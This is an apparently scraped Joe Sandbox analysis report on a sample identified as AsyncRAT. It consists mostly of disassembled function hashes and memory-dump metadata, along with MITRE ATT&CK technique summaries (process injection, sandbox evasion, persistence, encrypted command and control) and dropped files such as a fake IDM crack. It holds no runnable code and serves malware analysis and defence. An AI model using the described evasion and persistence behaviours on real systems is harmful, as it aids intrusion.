Opcode ID: b7856c88386513ac716ceb662c0166989273fa0d05c2f13e39cad5372f44ada5
Instruction ID: 98e9de74d65bf4eaabcf88f30c59e60772b0980a3202c9628673e6f345e7e8cf
Opcode Fuzzy Hash: b7856c88386513ac716ceb662c0166989273fa0d05c2f13e39cad5372f44ada5
Instruction Fuzzy Hash: 32E04F74908108ABC744DFD4D6409ADBBB8AB45310F14C0A9AD8557341CA719A42DB94

Uniqueness

Uniqueness Score: -1.00%

Function 062236A0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884393757.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6220000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e93441b71df5341646ec2b670d8a944acc1691c1d4ac8e2b6cc2d9cef970c83
Instruction ID: a7e9f76c70ee8e3a0a4b5a3296a297efc1f0d6144e15585c5aa2432f71425247
Opcode Fuzzy Hash: 4e93441b71df5341646ec2b670d8a944acc1691c1d4ac8e2b6cc2d9cef970c83
Instruction Fuzzy Hash: EED0C23494602EEFC3A4DBE9E4487BD37ACE701314F541058990403220EB740908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 06220C97 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884393757.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6220000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0742142fb8786f8ad3cb3e4c2e8a079af50e9b8b4ff2f7e71b6c793e91fa0d
Instruction ID: 7bb162b3c99ab668bee9ce381c2bef04b576719abe3b7434e94afeb3f0a8f149
Opcode Fuzzy Hash: 7c0742142fb8786f8ad3cb3e4c2e8a079af50e9b8b4ff2f7e71b6c793e91fa0d
Instruction Fuzzy Hash: ADF0393280065EDBCF129F54C814ACEBB72FF48308F108685EA1A33214CB30AAD6DF80

Uniqueness

Uniqueness Score: -1.00%

Function 06220AEF Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884393757.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6220000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f110074042f09ea654e2ec73845805ea91fce7060acbdf4e6eed76544c1b88
Instruction ID: 4b118ddd7aafe0e8d025c6c338062283e93a441daaf1d6f151b68fe96b53e137
Opcode Fuzzy Hash: 40f110074042f09ea654e2ec73845805ea91fce7060acbdf4e6eed76544c1b88
Instruction Fuzzy Hash: 1DF0A5749502188FDB58DF54C8A0ADCBBF1FF89704F1484998809AB351CB31AE86CF40

Uniqueness

Uniqueness Score: -1.00%

Function 062D8100 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884441326.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_62c0000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c070518a453d73e8253ed2441d65c10a2e7d7f29c9684a4013bd4bbfe18ab823
Instruction ID: a008d7abefdae467455cc09eaa7d800e7b2ad365100a9b37696105facc40b406
Opcode Fuzzy Hash: c070518a453d73e8253ed2441d65c10a2e7d7f29c9684a4013bd4bbfe18ab823
Instruction Fuzzy Hash: 88E01234D08208EFCB84DFE8D4416ACBBF4AB88304F14C0AADC2857341CA759A46DF80

Uniqueness

Uniqueness Score: -1.00%

Function 06222D10 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884393757.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6220000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb04328f20c8d5a5b62a22ffb24cd351c1201f883ef4086064a7bd01619e8bed
Instruction ID: c5a851e0aa3a1017c10cf36ad723d829f57b0acce1ee9d94539457bd29f1ec7a
Opcode Fuzzy Hash: bb04328f20c8d5a5b62a22ffb24cd351c1201f883ef4086064a7bd01619e8bed
Instruction Fuzzy Hash: 75E08C3490910CEBC744DBD4E4405ACBBB4EB45304F1091A99C0817341CAB25E42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 062DD030 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884441326.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_62c0000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7120811353aef4a9884de80e230f5aaf7eb8d81b31c206eab80fe8ff973692c
Instruction ID: 947131dc2019afe2dd33e2639c80f2fd05c6beed546394b60ca513c8833fee0d
Opcode Fuzzy Hash: f7120811353aef4a9884de80e230f5aaf7eb8d81b31c206eab80fe8ff973692c
Instruction Fuzzy Hash: 86E08C34908108DBC744DBD4E4419ACBBB4AB85305F1080A89C0817340CA726E42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 062C1122 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884441326.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_62c0000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595479b8be0de5d38679b4936e5ac5e1527ad3153c0725b964538f1e025dc8f1
Instruction ID: 774407b23b62c33055397343fa793838f563291623510c649889684cd51ce603
Opcode Fuzzy Hash: 595479b8be0de5d38679b4936e5ac5e1527ad3153c0725b964538f1e025dc8f1
Instruction Fuzzy Hash: 81E06DB47200198FD7A89B94D854A9E77B1FB86304F5090AA995A67240CF302D45CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 01440848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1868848740.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc383d1ce13a300e3b68edadf4cc93c0c114187752ffb34d143233971792acc
Instruction ID: 1ce75a92cd25d000d611ecb3f3cb395ddcc1cdab78c78e396bc9cf0394813b84
Opcode Fuzzy Hash: 4fc383d1ce13a300e3b68edadf4cc93c0c114187752ffb34d143233971792acc
Instruction Fuzzy Hash: 53D05E70A1020EEFCB08EFE8EA0555DF7F9EB44304B1082A9D808E7304EB316F009B82

Uniqueness

Uniqueness Score: -1.00%

Function 062236B0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884393757.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6220000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0b538b4f0e2cad798ad6a8f9c346a53ee3fd7dc9ce13a8d6999dc9403f758b
Instruction ID: e552c28b2101e07476bb2263f76d40f65071456629e7e0eb85edfdaeb997c586
Opcode Fuzzy Hash: 4a0b538b4f0e2cad798ad6a8f9c346a53ee3fd7dc9ce13a8d6999dc9403f758b
Instruction Fuzzy Hash: 65D0A73055A10EAAC794D6D9940467977ACD701204F0054589904132208AB40A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01440C98 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1868848740.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0a7945fbd79b6def23cff877bc42e06c27684c3ea0e77b92ffdf65b33e09b8
Instruction ID: 05cd795204730c27f44bb7477395ba1380f6db423f15725b4913d6f67f7b22df
Opcode Fuzzy Hash: cb0a7945fbd79b6def23cff877bc42e06c27684c3ea0e77b92ffdf65b33e09b8
Instruction Fuzzy Hash: 0AD0C7393605058FC744AF78E54492537F6BB4C7143508564F909CB329DE35EC51DB51

Uniqueness

Uniqueness Score: -1.00%

Function 062DD3C8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1884441326.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_62c0000_Ouopxupnarf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3197094493cc42b19279438f2b99ce2a1194ba5254276f9e703883903d0702
Instruction ID: 9552178c73fdad4a9c6ac6ebcac6971965cb306d8065a3b0bb3d0eb7202df110
Opcode Fuzzy Hash: fe3197094493cc42b19279438f2b99ce2a1194ba5254276f9e703883903d0702
Instruction Fuzzy Hash: 7BC08C3007AA098AC2D412C864083F436DD9B06315F082C10B90D010508AE06080CF60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallUtil.exePID: 8040, Parent PID: 7984COMMON

Executed Functions

Function 00F01348 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00F0138B

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: e52fc418679f590fd80e12cd67b74e5171a841cbb90ddebe14dfc00c122bb199
Instruction ID: 3bb17b6b9e04a84c6aaee4f8b1348300f817bdf672a5737defeb70f28555623b
Opcode Fuzzy Hash: e52fc418679f590fd80e12cd67b74e5171a841cbb90ddebe14dfc00c122bb199
Instruction Fuzzy Hash: DA218630F002169FCB44AB798551A6EBBF6BFC8710B144069E14AEB3A4EE30DC029792

Uniqueness

Uniqueness Score: -1.00%

Function 00F00AA9 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629561920efe33d2a9c91534cf00be9ed87e9239810b095d1c5482638790abcc
Instruction ID: 8b0878a1795948ee070d09bcb7ddb98694e4ab201436eba67b2d9dd4666f220b
Opcode Fuzzy Hash: 629561920efe33d2a9c91534cf00be9ed87e9239810b095d1c5482638790abcc
Instruction Fuzzy Hash: 0C51C339600285CFC706FB24E948A4A7772FF8D305752866AD405DB36DEB35AD4ADF80

Uniqueness

Uniqueness Score: -1.00%

Function 00E8D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909255214.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e8d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1b4254d31439b5e461de278dff1d8d90eecaac098931340ef73c91bf075aad
Instruction ID: d67f3c2850802335fc54074a576b77dbfe39c6efdd64509fc183994f852c9109
Opcode Fuzzy Hash: 1c1b4254d31439b5e461de278dff1d8d90eecaac098931340ef73c91bf075aad
Instruction Fuzzy Hash: 19210371508204DFDB05EF14D9C0F26BF65FB94328F20C569E80D5B296C336E856C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F009A8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873dac4321b023e686abc05de301c73c1f6a6160eb9e8cf4b210ea7eaa18c9ba
Instruction ID: 10f541f6f056bb2d457325ef05146cf1b0eafe578db014043433cdf5ba310c94
Opcode Fuzzy Hash: 873dac4321b023e686abc05de301c73c1f6a6160eb9e8cf4b210ea7eaa18c9ba
Instruction Fuzzy Hash: E2215E32B003439FDF64ABB6E95872E3BA4AF49711F104429A807D11D0EF289D05FB66

Uniqueness

Uniqueness Score: -1.00%

Function 00F0124D Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69e8c88edaa46729857bd71792103a214305130e3eacb24c41166eabd688aba
Instruction ID: 8a2c0550f5984e0443152fbe5e3a84dae2c4e8ecad07ae5669a9264b8802a568
Opcode Fuzzy Hash: a69e8c88edaa46729857bd71792103a214305130e3eacb24c41166eabd688aba
Instruction Fuzzy Hash: 39118671F002159FCB48BBBD895832E7ADAEFC8B10B20482DD15EE7395DE358D0647A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F009AD Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2f0c685334ebaca0f1bdd7aa4b20b5cc7ecccd75d02a20a7e3f7a8fe08c661
Instruction ID: a72beb9982ab29af8e496219e6707195d0f830944be386efcb3b3d86cfe1592c
Opcode Fuzzy Hash: ac2f0c685334ebaca0f1bdd7aa4b20b5cc7ecccd75d02a20a7e3f7a8fe08c661
Instruction Fuzzy Hash: 2A11BE32B007429FDB68AB76D94872E3BA4AB59351F14442DA807D11E0EF38DC09FB55

Uniqueness

Uniqueness Score: -1.00%

Function 00E8D3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909255214.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e8d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: f05048a94ff01b79f62d6ea4d35af5f89b7eae62c8ff347588cf4fa4c01b56c3
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: D8110372404280CFCB12DF10D9C4B16BF71FB94328F24C5A9D80D0B656C336E85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F01440 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ca0c2c0a06e0869f9ff734e8e63e838fc151942bf54c8dd4f43f2b51626be9
Instruction ID: 0ba30b609425c8ecfb5e6b61c59811b89e9e43cc8baa7c0127d5e02a1fe2eb60
Opcode Fuzzy Hash: a3ca0c2c0a06e0869f9ff734e8e63e838fc151942bf54c8dd4f43f2b51626be9
Instruction Fuzzy Hash: F1116D74B00209DFCB54EBB9D508A6E7BE6BF8931571108BAD40ADB3A4EA31DC41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F00E80 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1909605388.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da289a224f3a7638db7d818667f471539169ebeeac4e8e33b3671acf9a342ba9
Instruction ID: eb5f458775eac73c07dfc150da97bf0f9aee58869945b5275d8a7a8e23437477
Opcode Fuzzy Hash: da289a224f3a7638db7d818667f471539169ebeeac4e8e33b3671acf9a342ba9
Instruction Fuzzy Hash: 2EE08C323001045F8344962EE88885AB7DAEBC962431448BAE109C7322DD60DC054690

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KMj8h32vWy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Hzoynygqzv.exe

C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hzoynygqzv.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ouopxupnarf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xgfeie.tjf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxd1f2gq.puv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psw0gbbs.gph.ps1

Windows Analysis Report
KMj8h32vWy.exe

Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Function 0040108C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 239
filestringCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
